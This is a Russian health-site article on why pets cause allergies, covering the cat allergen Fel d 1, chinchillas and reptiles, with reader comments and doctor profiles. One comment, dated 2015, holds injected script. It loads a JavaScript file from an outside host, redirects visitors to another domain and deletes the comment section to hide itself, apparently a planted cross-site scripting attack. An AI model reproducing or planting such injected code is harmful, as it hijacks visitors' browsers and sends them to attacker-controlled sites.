Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Живые аллергены  >>  Живые аллергены
 
Обратная связь
 

Живые аллергены

Размер шрифта
26 марта 2012 10:00
  • google_analytics: false
  • Нравится

Почему домашние питомцы могут вызывать аллергические реакции у человека? Все ли животные аллергенны, и могут ли аллергики заводить живность в доме?

1 

  1. Кошки

90% населения уверены, что аллергия на домашних животных возникает из-за шерсти. На самом деле, аллергическая реакция развивается на кожные выделения (пот), испражнения и другие секреции. Животные выделения содержат определенные белки-антигены, на которые и реагирует человек. Наиболее частый аллерген у кошек – Fel D1 (производное от Felis domesticus – лат. Кошка домашняя), на него развивается до 80% всех аллергических реакций. Этот летучий аллерген находится в слюне и попадает в воздух, когда кошки себя вылизывают. Аллерген сохраняется месяцами, даже в отсутствие животных. Аллергичность животного определяется наличием именно этого антигена. Больше всего аллергенов содержат взрослые коты. Котята меньше вызывают аллергические реакции.

Существует заблуждение, что лысые кошки-сфинксы менее вызывают аллергю по причине того, что у них меньше шерсти. Эти кошки, действительно, меньше распространяют белков-антигенов, но потому, что меньше вылизываются. Считается даже, что одной калифорнийской компании удалось вывести породу кошек-сфинксов с модифицированным аллергеном, которые совершенно не вызывают реакций у человека. Но стоимость таких животных чрезвычайно высока.

1

  1. Шиншиллы

Шиншилла является самой гипоаллергенной домашней живностью. Мех шиншиллы – самый густой (25 тыс. волосков на 1 см2), потому что из одной волосяной луковицы растет до 60-80 волосков. У шиншилл почти нет сальных и потовых желез, они не линяют и не распространяют аллергены по поверхностям квартиры.

1

  1. Рептилии

Рептилии не потеют и не вылизывают себя, поэтому совершенно не распространяют белков-антигенов вокруг человека. К рептилиям относятся все черепахи и гекконы. Единственно влажная древесина и листва в террариуме может стать средой размножения грибков, которые вызывают аллергическую реакцию у человека.

Итак, даже если вы завели «гипоаллергенное» животное, соблюдайте чистоту в клетках животных, меняйте вовремя подстилку и мойте поилки с мисками, чтобы не получить новую аллергию.


Сюжеты по теме:
Никто не останется без друга. Животные для аллергиков

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - ntym

26 марта 2012 в 10:55

Цитировать   |   Пожаловаться

у кошек и собак на теле нет потовых желез! У собак потеют только ноги, они и пахнут потными ногами, как у человека

Спасибо за внимание к нашим материалам, и желание внести уточнения. 

Принято считать, что в коже собаки нет потовых желез, но такое мнение, вероятно, сложилось потому, что у собаки при явных тепловых нагрузках нет заметного потоотделения. В то же время имеется ряд микроскопических исследований, в которых потовые железы были обнаружены почти на всех участках кожи собак, более многочисленные на спине, в меньшем количестве на шее и боковых поверхностях и меньше всего — на вентральной поверхности тела. Этот вопрос был изучен японскими учеными Аоки и Вада. 

В любом случае, к вопросу возникновения аллергии, который освещался в данном разделе  сайта, это не имеет отношения. 

3 - zzzzzz

30 июня 2015 в 23:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.